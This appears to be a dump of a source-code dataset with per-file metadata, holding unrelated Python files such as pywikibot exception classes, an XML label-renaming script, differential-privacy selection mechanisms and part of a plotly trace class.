content
stringlengths 7
928k
| avg_line_length
float64 3.5
33.8k
| max_line_length
int64 6
139k
| alphanum_fraction
float64 0.08
0.96
| licenses
sequence | repository_name
stringlengths 7
104
| path
stringlengths 4
230
| size
int64 7
928k
| lang
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|
#!/usr/bin/env python3
# Enter your code here. Read input from STDIN. Print output to STDOUT
def string_manipulate(string):
even_string=''
odd_string=''
for idx, val in enumerate(string):
if idx % 2 == 0:
even_string+=val
else:
odd_string+=val
return even_string+" "+odd_string
if __name__ == '__main__':
T = int(input().strip())
for t in range(T):
string = str(input().strip())
print(string_manipulate(string))
| 21.12 | 69 | 0.566288 | [
"MIT"
] | vas610/hackerrank-30daysofcode-python | day6.py | 528 | Python |
class A:
def foo(self):
print("A")
class B(A):
# def foo(self):
# print("B")
pass
class C(A):
def foo(self):
print("C")
super(C, self).foo()
class D(B, C):
def foo(self):
print("D")
super(D, self).foo()
if __name__ == '__main__':
d = D()
d.foo() | 13.12 | 28 | 0.445122 | [
"MIT"
] | jiauy/before_work | PythonAndOop/N42_super_3.py | 328 | Python |
from torch.utils.data import Dataset
from typing import List
import torch
from .. import SentenceTransformer
from ..readers.InputExample import InputExample
class SentencesDataset(Dataset):
"""
Dataset for smart batching, that is each batch is only padded to its longest sequence instead of padding all
sequences to the max length.
The SentenceBertEncoder.smart_batching_collate is required for this to work.
SmartBatchingDataset does *not* work without it.
"""
def __init__(self,
examples: List[InputExample],
model: SentenceTransformer
):
"""
Create a new SentencesDataset with the tokenized texts and the labels as Tensor
:param examples
A list of sentence.transformers.readers.InputExample
:param model:
SentenceTransformerModel
"""
self.model = model
self.examples = examples
self.label_type = torch.long if isinstance(self.examples[0].label, int) else torch.float
def __getitem__(self, item):
label = torch.tensor(self.examples[item].label, dtype=self.label_type)
if self.examples[item].texts_tokenized is None:
self.examples[item].texts_tokenized = [self.model.tokenize(text) for text in self.examples[item].texts]
return self.examples[item].texts_tokenized, label
def __len__(self):
return len(self.examples)
| 35.195122 | 115 | 0.680527 | [
"MIT"
] | 21WelfareForEveryone/WelfareForEveryOne | ai/KoSentenceBERTchatbot/KoSentenceBERT/sentence_transformers/datasets/SentencesDataset.py | 1,443 | Python |
# -*- coding: utf-8 -*-
"""
Exception and warning classes used throughout the framework.
Error: Base class, all exceptions should the subclass of this class.
- NoUsername: Username is not in user-config.py, or it is invalid.
- UserBlocked: Username or IP has been blocked
- AutoblockUser: requested action on a virtual autoblock user not valid
- UserRightsError: insufficient rights for requested action
- BadTitle: Server responded with BadTitle
- InvalidTitle: Invalid page title
- CaptchaError: Captcha is asked and config.solve_captcha == False
- Server504Error: Server timed out with HTTP 504 code
- i18n.TranslationError: i18n/l10n message not available
- UnknownExtension: Extension is not defined for this site
SiteDefinitionError: Site loading problem
- UnknownSite: Site does not exist in Family
- UnknownFamily: Family is not registered
PageRelatedError: any exception which is caused by an operation on a Page.
- NoPage: Page does not exist
- UnsupportedPage: Page is not supported due to a namespace restriction
- IsRedirectPage: Page is a redirect page
- IsNotRedirectPage: Page is not a redirect page
- CircularRedirect: Page is a circular redirect
- InterwikiRedirectPage: Page is a redirect to another site
- SectionError: The section specified by # does not exist
- NotEmailableError: The target user has disabled email
- NoMoveTarget: An expected move target page does not exist
PageLoadRelatedError: any exception which happens while loading a Page.
- InconsistentTitleReceived: Page receives a title inconsistent with query
PageSaveRelatedError: page exceptions within the save operation on a Page
(alias: PageNotSaved).
- SpamfilterError: MediaWiki spam filter detected a blacklisted URL
- TitleblacklistError: MediaWiki detected a blacklisted page title
- OtherPageSaveError: misc. other save related exception.
- LockedPage: Page is locked
- LockedNoPage: Title is locked against creation
- CascadeLockedPage: Page is locked due to cascading protection
- EditConflict: Edit conflict while uploading the page
- PageDeletedConflict: Page was deleted since being retrieved
- PageCreatedConflict: Page was created by another user
- ArticleExistsConflict: Page article already exists
- NoCreateError: parameter nocreate not allow page creation
ServerError: a problem with the server.
- FatalServerError: A fatal/non-recoverable server error
WikiBaseError: any issue specific to Wikibase.
- CoordinateGlobeUnknownException: globe is not implemented yet.
- EntityTypeUnknownException: entity type is not available on the site.
TimeoutError: request failed with a timeout
DeprecationWarning: old functionality replaced by new functionality
PendingDeprecationWarning: problematic code which has not yet been
fully deprecated, possibly because a replacement is not available
RuntimeWarning: problems developers should have fixed, and users need to
be aware of its status.
- tools._NotImplementedWarning: do not use
- NotImplementedWarning: functionality not implemented
UserWarning: warnings targeted at users
- config2._ConfigurationDeprecationWarning: user configuration file problems
- login._PasswordFileWarning: password file problems
- ArgumentDeprecationWarning: command line argument problems
- FamilyMaintenanceWarning: missing information in family definition
"""
#
# (C) Pywikibot team, 2008-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
from pywikibot.tools import (
# __ to avoid conflict with ModuleDeprecationWrapper._deprecated
deprecated as __deprecated,
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
UnicodeMixin,
UnicodeType,
_NotImplementedWarning,
)
class NotImplementedWarning(_NotImplementedWarning):
"""Feature that is no longer implemented."""
pass
class ArgumentDeprecationWarning(UserWarning):
"""Command line argument that is no longer supported."""
pass
class FamilyMaintenanceWarning(UserWarning):
"""Family class is missing definitions."""
pass
class Error(UnicodeMixin, Exception):
"""Pywikibot error."""
# NOTE: UnicodeMixin must be the first object Error class is derived from.
def __init__(self, arg):
"""Initializer."""
self.unicode = arg
def __unicode__(self):
"""Return a unicode string representation."""
return self.unicode
class PageRelatedError(Error):
"""
Abstract Exception, used when the exception concerns a particular Page.
This class should be used when the Exception concerns a particular
Page, and when a generic message can be written once for all.
"""
# Preformatted UNICODE message where the page title will be inserted
# Override this in subclasses.
# 'Oh noes! Page %s is too funky, we should not delete it ;('
message = None
def __init__(self, page, message=None):
"""
Initializer.
@param page: Page that caused the exception
@type page: Page object
"""
if message:
self.message = message
if self.message is None:
raise Error("PageRelatedError is abstract. Can't instantiate it!")
self.page = page
self.title = page.title(as_link=True)
self.site = page.site
if '%(' in self.message and ')s' in self.message:
super(PageRelatedError, self).__init__(
self.message % self.__dict__)
else:
super(PageRelatedError, self).__init__(self.message % page)
def getPage(self):
"""Return the page related to the exception."""
return self.page
class PageSaveRelatedError(PageRelatedError):
"""Saving the page has failed."""
message = 'Page %s was not saved.'
# This property maintains backwards compatibility with
# the old PageNotSaved which inherited from Error
# (not PageRelatedError) and exposed the normal 'args'
# which could be printed
@property
def args(self):
"""Expose args."""
return UnicodeType(self)
class OtherPageSaveError(PageSaveRelatedError):
"""Saving the page has failed due to uncatchable error."""
message = 'Edit to page %(title)s failed:\n%(reason)s'
def __init__(self, page, reason):
"""Initializer.
@param reason: Details of the problem
@type reason: Exception or basestring
"""
self.reason = reason
super(OtherPageSaveError, self).__init__(page)
@property
def args(self):
"""Expose args."""
return UnicodeType(self.reason)
class NoUsername(Error):
"""Username is not in user-config.py."""
pass
class NoPage(PageRelatedError):
"""Page does not exist."""
message = "Page %s doesn't exist."
pass
class UnsupportedPage(PageRelatedError):
"""Unsupported page due to namespace restriction."""
# namespaces < 0 aren't supported (T169213)
message = 'Page %s is not supported due to namespace restriction.'
pass
class NoMoveTarget(PageRelatedError):
"""Expected move target page not found."""
message = 'Move target page of %s not found.'
pass
class PageLoadRelatedError(PageRelatedError):
"""Loading the contents of a Page object has failed."""
message = 'Page %s was not loaded.'
class InconsistentTitleReceived(PageLoadRelatedError):
"""Page receives a title inconsistent with query."""
def __init__(self, page, actual):
"""Initializer.
@param page: Page that caused the exception
@type page: Page object
@param actual: title obtained by query
@type reason: basestring
"""
self.message = "Query on %s returned data on '{0}'".format(actual)
super(InconsistentTitleReceived, self).__init__(page)
class SiteDefinitionError(Error):
"""Site does not exist."""
pass
# The name 'NoSuchSite' was used for all site related issues,
# and it used message "Site does not exist".
# These are retain for backwards compatibility with scripts.
NoSuchSite = SiteDefinitionError
class UnknownSite(SiteDefinitionError):
"""Site does not exist in Family."""
pass
class UnknownFamily(SiteDefinitionError):
"""Family is not registered."""
pass
class UnknownExtension(Error, NotImplementedError):
"""Extension is not defined."""
pass
class IsRedirectPage(PageRelatedError):
"""Page is a redirect page."""
message = 'Page %s is a redirect page.'
pass
class IsNotRedirectPage(PageRelatedError):
"""Page is not a redirect page."""
message = 'Page %s is not a redirect page.'
pass
class CircularRedirect(PageRelatedError):
"""Page is a circular redirect.
Exception argument is the redirect target; this may be the same title
as this page or a different title (in which case the target page directly
or indirectly redirects back to this one)
"""
message = 'Page %s is a circular redirect.'
class InterwikiRedirectPage(PageRelatedError):
"""
Page is a redirect to another site.
This is considered invalid in Pywikibot. See bug T75184.
"""
message = ('Page redirects to a page on another Site.\n'
'Page: %(page)s\n'
'Target page: %(target_page)s on %(target_site)s.')
def __init__(self, page, target_page):
"""Initializer.
@param target_page: Target page of the redirect.
@type reason: Page
"""
self.target_page = target_page
self.target_site = target_page.site
super(InterwikiRedirectPage, self).__init__(page)
class InvalidTitle(Error):
"""Invalid page title."""
pass
class LockedPage(PageSaveRelatedError):
"""Page is locked."""
message = 'Page %s is locked.'
pass
class LockedNoPage(LockedPage):
"""Title is locked against creation."""
message = 'Page %s does not exist and is locked preventing creation.'
pass
class CascadeLockedPage(LockedPage):
"""Page is locked due to cascading protection."""
message = 'Page %s is locked due to cascading protection.'
pass
class SectionError(Error):
"""The section specified by # does not exist."""
pass
PageNotSaved = PageSaveRelatedError
class NoCreateError(PageSaveRelatedError):
"""Parameter nocreate doesn't allow page creation."""
message = 'Page %s could not be created due to parameter nocreate'
pass
class EditConflict(PageSaveRelatedError):
"""There has been an edit conflict while uploading the page."""
message = 'Page %s could not be saved due to an edit conflict'
pass
class PageDeletedConflict(EditConflict):
"""Page was deleted since being retrieved."""
message = 'Page %s has been deleted since last retrieved.'
pass
class PageCreatedConflict(EditConflict):
"""Page was created by another user."""
message = 'Page %s has been created since last retrieved.'
pass
class ArticleExistsConflict(EditConflict):
"""Page already exists."""
message = ('Destination article %s already exists and is not a redirect '
'to the source article')
pass
class SpamfilterError(PageSaveRelatedError):
"""Page save failed because MediaWiki detected a blacklisted spam URL."""
message = ('Edit to page %(title)s rejected by spam filter due to '
'content:\n%(url)s')
def __init__(self, page, url):
"""Initializer."""
self.url = url
super(SpamfilterError, self).__init__(page)
class TitleblacklistError(PageSaveRelatedError):
"""Page save failed because MediaWiki detected a blacklisted page title."""
message = 'Page %s is title-blacklisted.'
pass
class ServerError(Error):
"""Got unexpected server response."""
pass
class FatalServerError(ServerError):
"""A fatal server error will not be corrected by resending the request."""
pass
class Server504Error(ServerError):
"""Server timed out with HTTP 504 code."""
pass
class Server414Error(ServerError):
"""Server returned with HTTP 414 code."""
pass
class BadTitle(Error):
"""Server responded with BadTitle."""
pass
# UserBlocked exceptions should in general not be caught. If the bot has
# been blocked, the bot operator should address the reason for the block
# before continuing.
class UserBlocked(Error):
"""Your username or IP has been blocked."""
pass
class CaptchaError(Error):
"""Captcha is asked and config.solve_captcha == False."""
pass
class AutoblockUser(Error):
"""Requested action on a virtual autoblock user not valid.
The class AutoblockUserError is an exception that is raised whenever
an action is requested on a virtual autoblock user that's not available
for him (i.e. roughly everything except unblock).
"""
pass
class UserRightsError(Error):
"""Insufficient user rights to perform an action."""
pass
class HiddenKeyError(UserRightsError, KeyError):
"""Insufficient user rights to view the hidden key."""
pass
class NotEmailableError(PageRelatedError):
"""This user is not emailable."""
message = '%s is not emailable.'
pass
class WikiBaseError(Error):
"""Wikibase related error."""
pass
class CoordinateGlobeUnknownException(WikiBaseError, NotImplementedError):
"""This globe is not implemented yet in either WikiBase or pywikibot."""
pass
class EntityTypeUnknownException(WikiBaseError):
"""The requested entity type is not recognised on this site."""
pass
class TimeoutError(Error):
"""Request failed with a timeout error."""
pass
@__deprecated(since='20141214')
class DeprecatedPageNotFoundError(Error):
"""Page not found (deprecated)."""
pass
@__deprecated(since='20141218')
class _EmailUserError(UserRightsError, NotEmailableError):
"""Email related error."""
pass
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr(
'UploadWarning',
replacement_name='pywikibot.data.api.UploadWarning',
warning_message='pywikibot.exceptions.UploadWarning is deprecated; '
'use APISite.upload with a warning handler instead.',
since='20150921')
wrapper._add_deprecated_attr('PageNotFound', DeprecatedPageNotFoundError,
warning_message='{0}.{1} is deprecated, and no '
'longer used by pywikibot; use '
'http.fetch() instead.',
since='20141214')
wrapper._add_deprecated_attr(
'UserActionRefuse', _EmailUserError,
warning_message='UserActionRefuse is deprecated; '
'use UserRightsError and/or NotEmailableError',
since='20141218')
| 24.122383 | 79 | 0.696262 | [
"MIT"
] | 5j9/pywikibot-core | pywikibot/exceptions.py | 14,980 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 3/5/2018 1:49 PM
# @Author : sunyonghai
# @File : xml_utils.py
# @Software: ZJ_AI
#此程序用于编辑xml文件
# =========================================================
import random
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import Element
import os
import cv2
from data_processing.utils.io_utils import *
def read_xml(in_path):
'''''读取并解析xml文件
in_path: xml路径
return: ElementTree'''
# tree = ET()
tree = ET.parse(in_path)
return tree
def write_xml(tree, out_path):
'''''将xml文件写出
tree: xml树
out_path: 写出路径'''
tree.write(out_path, encoding="utf-8",xml_declaration=True)
def if_match(node, kv_map):
'''''判断某个节点是否包含所有传入参数属性
node: 节点
kv_map: 属性及属性值组成的map'''
for key in kv_map:
if node.get(key) != kv_map.get(key):
return False
return True
# ---------------search -----
def find_nodes(tree, path):
'''''查找某个路径匹配的所有节点
tree: xml树
path: 节点路径'''
return tree.findall(path)
def get_node_by_keyvalue(nodelist, kv_map):
'''''根据属性及属性值定位符合的节点,返回节点
nodelist: 节点列表
kv_map: 匹配属性及属性值map'''
result_nodes = []
for node in nodelist:
if if_match(node, kv_map):
result_nodes.append(node)
return result_nodes
# ---------------change -----
def change_node_properties(nodelist, kv_map, is_delete=False):
'''''修改/增加 /删除 节点的属性及属性值
nodelist: 节点列表
kv_map:属性及属性值map'''
for node in nodelist:
for key in kv_map:
if is_delete:
if key in node.attrib:
del node.attrib[key]
else:
node.set(key, kv_map.get(key))
def change_node_text(nodelist, text, is_add=False, is_delete=False):
'''''改变/增加/删除一个节点的文本
nodelist:节点列表
text : 更新后的文本'''
for node in nodelist:
if is_add:
node.text += text
elif is_delete:
node.text = ""
else:
node.text = text
def create_node(tag, property_map, content):
'''''新造一个节点
tag:节点标签
property_map:属性及属性值map
content: 节点闭合标签里的文本内容
return 新节点'''
element = Element(tag, property_map)
element.text = content
return element
def add_child_node(nodelist, element):
'''''给一个节点添加子节点
nodelist: 节点列表
element: 子节点'''
for node in nodelist:
node.append(element)
def del_node_by_tagkeyvalue(nodelist, tag, kv_map):
'''''同过属性及属性值定位一个节点,并删除之
nodelist: 父节点列表
tag:子节点标签
kv_map: 属性及属性值列表'''
for parent_node in nodelist:
children = parent_node.getchildren()
for child in children:
if child.tag == tag and if_match(child, kv_map):
parent_node.remove(child)
#
# if __name__ == "__main__":
# # 1. 读取xml文件
# tree = read_xml("./test.xml")
#
# # 2. 属性修改
# # A. 找到父节点
# nodes = find_nodes(tree, "processers/processer")
# # B. 通过属性准确定位子节点
# result_nodes = get_node_by_keyvalue(nodes, {"name": "BProcesser"})
# # C. 修改节点属性
# change_node_properties(result_nodes, {"age": "1"})
# # D. 删除节点属性
# change_node_properties(result_nodes, {"value": ""}, True)
#
# # 3. 节点修改
# # A.新建节点
# a = create_node("person", {"age": "15", "money": "200000"}, "this is the firest content")
# # B.插入到父节点之下
# add_child_node(result_nodes, a)
#
# # 4. 删除节点
# # 定位父节点
# del_parent_nodes = find_nodes(tree, "processers/services/service")
# # 准确定位子节点并删除之
# target_del_node = del_node_by_tagkeyvalue(del_parent_nodes, "chain", {"sequency": "chain1"})
#
# # 5. 修改节点文本
# # 定位节点
# text_nodes = get_node_by_keyvalue(find_nodes(tree, "processers/services/service/chain"), {"sequency": "chain3"})
# change_node_text(text_nodes, "new text")
#
# # 6. 输出到结果文件
# write_xml(tree, "./out.xml")
#
def modify_label_name(input_path):
# train VOC2012
data_paths = [os.path.join(input_path,s) for s in ['train_data']]
print('Parsing annotation files')
for data_path in data_paths:
annot_path = os.path.join(data_path, 'Annotations')
annots = [os.path.join(annot_path, s) for s in os.listdir(annot_path)]
for annot in annots:
try:
et = ET.parse(annot)
element = et.getroot()
element_objs = element.findall('object')
for element_obj in element_objs:
node = element_obj.find('name')
print(node.text)
class_name = element_obj.find('name').text
if class_name == 'mn-zgl-pz-cmw-250ml': # 1
node.text = 'mn-zgl-hz-cmw-250ml'
# if class_name == 'kkklgz330ml': # 1
# node.text = 'kkkl-kkkl-gz-yw-330ml'
# elif class_name == 'nfsq550ml': #2
# node.text = 'nfsq-nfsq-pz-yw-550ml'
# elif class_name == 'jdbpz500ml': #3
# node.text = 'jdb-jdb-pz-yw-500ml'
# elif class_name == 'wljgz310ml': #4
# node.text = 'wlj-wlj-gz-yw-310ml'
# elif class_name == 'wtnmcgz310ml': #5
# node.text = 'wt-wtnmc-gz-yw-310ml'
# elif class_name == 'ybpz550ml': #6
# node.text = 'yb-yb-pz-yw-550ml'
# elif class_name == 'mdpzqn600ml': #7
# node.text = 'md-md-pz-qn-600ml'
# elif class_name == 'xbgz330ml': #8
# node.text = 'xb-xb-gz-yw-330ml'
# elif class_name == 'fdgz330ml': #9
# node.text = 'fd-fd-gz-yw-330ml'
# elif class_name == 'bsklpz600ml': #10
# node.text = 'bskl-bskl-pz-yw-600ml'
# elif class_name == 'tdyhgz330ml': #11
# node.text = 'tdyh-tdyh-gz-yw-330ml'
# elif class_name == 'qxgz330ml': #12
# node.text = 'qx-qx-gz-yw-330ml'
# elif class_name == 'bwpjgz550ml': #13
# node.text = 'bw-pj-gz-yw-550ml'
# elif class_name == 'qdpjgz330ml': #14
# node.text = 'qdpj-qdpj-gz-yw-330ml'
# elif class_name == 'qoo310ml': #15
# node.text = 'qoo-qoo-gz-yw-310ml'
# elif class_name == 'jtpz560ml': #16
# node.text = 'jt-jt-pz-yw560ml'
# elif class_name == 'mndgz330ml': #17
# node.text = 'mnd-mnd-gz-yw-330ml'
# elif class_name == 'mndgz380ml': #18
# node.text = 'mnd-mnd-gz-yw-380ml'
# elif class_name == 'blcypz550ml': #19
# node.text = 'blcy-blcy-pz-yw-550ml'
# else:
# node.text = 'other' #20
print(node.text)
write_xml(et, annot)
except Exception as e:
print('Exception in pascal_voc_parser: {}'.format(e))
continue
def modify2_label_name(input_path):
# train VOC2012
#dirs = []
#data_paths = [os.path.join(input_path,s) for s in dirs]
# data_paths = [os.path.join(input_path,s) for s in ['train_data-2018-3-20_1']]
print('Parsing annotation files')
#for data_path in data_paths:
annot_path = input_path
annots = [os.path.join(annot_path, s) for s in os.listdir(annot_path)]
for annot in annots:
try:
et = ET.parse(annot)
element = et.getroot()
element_objs = element.findall('object')
for element_obj in element_objs:
node = element_obj.find('name')
class_name = element_obj.find('name').text
if class_name == 'yd-ydmtcqscm-pz-cmw-56g':
print(node.text)
print(annot)
node.text = 'yd-ydwtkxt-pz-qscmw-56g'
#print(node.text)
elif class_name == 'htk-tls-dz-hd-288g':
print(node.text)
print(annot)
node.text = 'htk-tls-dz-hdw-288g'
print(node.text)
elif class_name == 'hwd-hwdfbm-tz-hxw-75g':
print(node.text)
print(annot)
node.text = 'hwd-hwdfbm-tz-hxw-84g'
print(node.text)
elif class_name == 'df-dfqkl-dz-zrqkl--43g':
print(node.text)
print(annot)
node.text = 'df-dfqkl-dz-zrqkl-43g'
print(node.text)
# elif class_name == 'mn-zgl-pz-cmw-250ml': # 1
# print(node.text)
# print(annot)
# node.text = 'mn-zgl-hz-cmw-250ml'
# print(node.text)
# elif class_name == 'None': # 1
# print(node.text)
# print(annot)
# node.text = 'yb-ybcjs-pz-yw-555ml'
# print(node.text)
# elif class_name == 'db-jdblc-gz-yw-310ml': # 1
# print(node.text)
# print(annot)
# node.text = 'jdb-jdblc-gz-yw-310ml'
# print(node.text)
# elif class_name == 'jdb-jdblc-pz-yw-500ml': # 1
# print(node.text)
# print(annot)
# node.text = 'jdb-jdb-pz-yw-500ml'
# print(node.text)
# elif class_name == 'wlj-wljlc-dz-yw-250ml': # 1
# print(node.text)
# print(annot)
# node.text = 'jdb-jdb-pz-yw-500ml'
# print(node.text)
# elif class_name == 'mn-zgl-pz-cmw-250ml': # 1
# node.text = 'mn-zgl-hz-cmw-250ml'
# print(node.text)
# elif class_name == 'yl-ylcnn-pz-yw-250ml': #2
# node.text = 'yl-ylcnn-hz-yw-250ml'
# elif class_name == 'lzs-rnbdwhbg-bz-nlw-145g': #3
# node.text = 'lzs-rnbdwhbg-hz-nlw-145g'
# elif class_name == 'ksf-ksfbg-bz-qxnmw-125g': #3
# node.text = 'ksf-ksfbg-dz-qxnmw-125g'
# elif class_name == 'lfe-lfeyrbttgsq-dz-yrbtr-30g': #4
# node.text = 'lfe-lfeyrbttgsq-hz-yrbtr-30g'
# elif class_name == 'df-dfqkl-bz-zrqkl--43g': #5
# node.text = 'df-dfqkl-dz-zrqkl--43g'
# elif class_name == 'slj-sljqkl-bz-hsjx-35g': #6
# node.text = 'slj-sljqkl-dz-hsjx-35g'
# elif class_name == 'ls-lssp-bz-mgjdyw-70g': #7
# node.text = 'ls-lssp-dz-mgjdyw-70g'
# elif class_name == 'wtn-wtnywdn-pz-yw-250ml': #8
# node.text = 'wtn-wtnywdn-hz-yw-250ml'
# elif class_name == 'ksf-ksfhsnrm-tz-nr-105g': #9
# node.text = 'ty-tyhsnrm-tz-nr-105g'
# elif class_name == 'ty-tyltscnrm-tz-scnr-82.5g': #10
# node.text = 'ksf-ksfltscnrm-tz-scnr-82.5g'
# elif class_name == 'yj-pjfz-bz-sjw-100g': #11
# node.text = 'yj-pjfz-dz-sjw-100g'
# elif class_name == 'jb-jbjyz-bz-yw-95g': #12
# node.text = 'jb-jbjyz-dz-yw-95g'
# elif class_name == 'wwsp-wwxxs-bz-yw-60g': #13
# node.text = 'wwsp-wwxxs-dz-yw-60g'
write_xml(et, annot)
except Exception as e:
print('Exception in pascal_voc_parser: {}'.format(e))
continue
def get_split():
str = 'blcy-blcy-pz-yw-550ml'
class_name = str.split('-')[2]
print(class_name)
def get_imagenamge_by_label(input_path):
data_paths = [os.path.join(input_path,s) for s in ['train_data-2018-3-7']]
for data_path in data_paths:
annot_path = os.path.join(data_path, 'Annotations')
annots = [os.path.join(annot_path, s) for s in os.listdir(annot_path)]
for annot in annots:
try:
et = ET.parse(annot)
element = et.getroot()
element_objs = element.findall('object')
for element_obj in element_objs:
node = element_obj.find('name')
class_name = element_obj.find('name').text
if class_name == 'qdpj-qdpj-gz-yw-330ml':
print(annot)
except Exception as ex:
print(ex)
# if __name__ == "__main__":
# input_path = 'data/'
# modify_label_name(input_path)
# if __name__ == "__main__":
# input_path = 'data/train_data-2018-3-7/'
# rename_image(input_path)
# if __name__ == "__main__":
# get_split()
# if __name__ == "__main__":
# input_path = 'data/all_data/'
# create_Main(input_path)
if __name__ == "__main__":
input_path = 'D:\\all_data\\predict_data-2018-05-11\\Annotations'
modify2_label_name(input_path)
# if __name__ == "__main__":
# input_path = 'data/'
# get_imagenamge_by_label(input_path) | 36.15748 | 118 | 0.496225 | [
"MIT"
] | FMsunyh/re_com | development/server/algorithm/tf_faster_rcnn/data_processing/utils/xml_utils.py | 14,434 | Python |
import numpy as np
from collections import defaultdict
from scipy.optimize import minimize_scalar, root_scalar, bracket
from scipy.special import logsumexp
def em_worst_expected_error(n=2, eps=1, delta=1):
def foo(p):
return np.log(p) * (1 - 1 / (1 + (n-1)*p))
a = -minimize_scalar(lambda p: foo(p), bounds=(0,1), method='bounded').fun
return a * 2 * delta / eps
def pf_worst_expected_error(n=2, eps=1, delta=1):
def foo(p):
return np.log(p) * (1 - (1 - (1-p)**n) / (n*p))
a = -minimize_scalar(lambda p: foo(p), bounds=(0,1), method='bounded').fun
return a * 2 * delta / eps
def pf_pmf(q, eps=1.0, sensitivity=1.0, monotonic=False):
coef = 1.0 if monotonic else 0.5
p = np.exp(coef*eps/sensitivity*(q - q.max()))
n = q.size
# first we will calculate
# sum(prod(p_i, i in S), |S| = k) for each k
subsets = np.zeros(n)
curr = np.cumsum(p)
subsets[0] = curr[-1]
for j in range(1,n):
curr[j:] = np.cumsum(curr[j-1:-1]*p[j:])
subsets[j] = curr[-1]
# coefficient vector: (-1)^k / (k+1) for k = 1..n
coef = (np.arange(n) % 2 * 2 - 1) / (np.arange(n)+2)
# we will now calculate
# sum(prod(p_i, i in S), |S| = k, r not in S)
# and compute the final probabilities
ans = np.zeros(n)
for i in range(n):
new = np.copy(subsets)
new[0] -= p[i]
for j in range(1,n):
new[j] -= new[j-1]*p[i]
ans[i] = p[i] * (1 + new @ coef)
return ans
def em_pmf(q, eps=1.0, sensitivity=1.0, monotonic=False):
coef = 1.0 if monotonic else 0.5
q = q - q.max()
logits = coef*eps/sensitivity*q
return np.exp(logits - logsumexp(logits))
#p = np.exp(coef*eps/sensitivity*q)
#return p / p.sum()
def em(q, eps=1.0, sensitivity=1.0, prng=np.random, monotonic=False):
coef = 1.0 if monotonic else 0.5
q = q - q.max()
p = np.exp(coef*eps/sensitivity*q)
p /= p.sum()
return prng.choice(p.size, p=p)
def pf(q, eps=1.0, sensitivity=1.0, prng=np.random, monotonic=False):
coef = 1.0 if monotonic else 0.5
q = q - q.max()
p = np.exp(coef*eps/sensitivity*q)
for i in prng.permutation(p.size):
if prng.rand() <= p[i]:
return i
def expected_error(q, eps, pmf=em_pmf):
# compute the expected error of the mechanism (given it's probability mass function)
ans = q.max() - pmf(q,eps) @ q
maxerr = q.max() - q.mean()
if ans > maxerr or ans < 0:
return maxerr
return ans
def variance(q, eps, pmf=em_pmf):
e = expected_error(q, eps, pmf)
return pmf(q, eps) @ (q.max() - q)**2 - e**2
def expected_epsilon(q, err, bounds=None, pmf=em_pmf):
# computed the epsilon required to achieve given expected error
foo = lambda eps: expected_error(q, eps, pmf) - err
if bounds is None:
eps = 1.0
while foo(eps) > 0:
eps *= 2
while foo(eps) < 0:
eps /= 2.0
bounds = [eps,2*eps]
return root_scalar(foo,bracket=bounds,method='bisect').root
def max_epsilon_ratio(q):
def foo(eps):
err = expected_error(q, eps, pf_pmf)
eps2 = expected_epsilon(q, err, [eps, 2*eps])
return -eps2/eps
br = bracket(foo, 1e-3, 1.0)[0:3]
ans = minimize_scalar(foo, bracket=br, method='brent')
eps0 = ans.x
err = expected_error(q, eps0, pf_pmf)
eps1 = expected_epsilon(q, err, [eps0, 2*eps0])
return eps0, err, eps1
| 29.403361 | 88 | 0.575879 | [
"MIT"
] | gonzalo-munillag/Exponential_Randomised_Response | Experiments/mechanisms.py | 3,499 | Python |
from plotly.basedatatypes import BaseTraceType as _BaseTraceType
import copy as _copy
class Histogram2dContour(_BaseTraceType):
# class properties
# --------------------
_parent_path_str = ""
_path_str = "histogram2dcontour"
_valid_props = {
"autobinx",
"autobiny",
"autocolorscale",
"autocontour",
"bingroup",
"coloraxis",
"colorbar",
"colorscale",
"contours",
"customdata",
"customdatasrc",
"histfunc",
"histnorm",
"hoverinfo",
"hoverinfosrc",
"hoverlabel",
"hovertemplate",
"hovertemplatesrc",
"ids",
"idssrc",
"legendgroup",
"legendgrouptitle",
"legendrank",
"line",
"marker",
"meta",
"metasrc",
"name",
"nbinsx",
"nbinsy",
"ncontours",
"opacity",
"reversescale",
"showlegend",
"showscale",
"stream",
"textfont",
"texttemplate",
"type",
"uid",
"uirevision",
"visible",
"x",
"xaxis",
"xbingroup",
"xbins",
"xcalendar",
"xhoverformat",
"xsrc",
"y",
"yaxis",
"ybingroup",
"ybins",
"ycalendar",
"yhoverformat",
"ysrc",
"z",
"zauto",
"zhoverformat",
"zmax",
"zmid",
"zmin",
"zsrc",
}
# autobinx
# --------
@property
def autobinx(self):
"""
Obsolete: since v1.42 each bin attribute is auto-determined
separately and `autobinx` is not needed. However, we accept
`autobinx: true` or `false` and will update `xbins` accordingly
before deleting `autobinx` from the trace.
The 'autobinx' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autobinx"]
@autobinx.setter
def autobinx(self, val):
self["autobinx"] = val
# autobiny
# --------
@property
def autobiny(self):
"""
Obsolete: since v1.42 each bin attribute is auto-determined
separately and `autobiny` is not needed. However, we accept
`autobiny: true` or `false` and will update `ybins` accordingly
before deleting `autobiny` from the trace.
The 'autobiny' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autobiny"]
@autobiny.setter
def autobiny(self, val):
self["autobiny"] = val
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`colorscale`. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be chosen
according to whether numbers in the `color` array are all
positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# autocontour
# -----------
@property
def autocontour(self):
"""
Determines whether or not the contour level attributes are
picked by an algorithm. If True, the number of contour levels
can be set in `ncontours`. If False, set the contour level
attributes in `contours`.
The 'autocontour' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocontour"]
@autocontour.setter
def autocontour(self, val):
self["autocontour"] = val
# bingroup
# --------
@property
def bingroup(self):
"""
Set the `xbingroup` and `ybingroup` default prefix For example,
setting a `bingroup` of 1 on two histogram2d traces will make
them their x-bins and y-bins match separately.
The 'bingroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["bingroup"]
@bingroup.setter
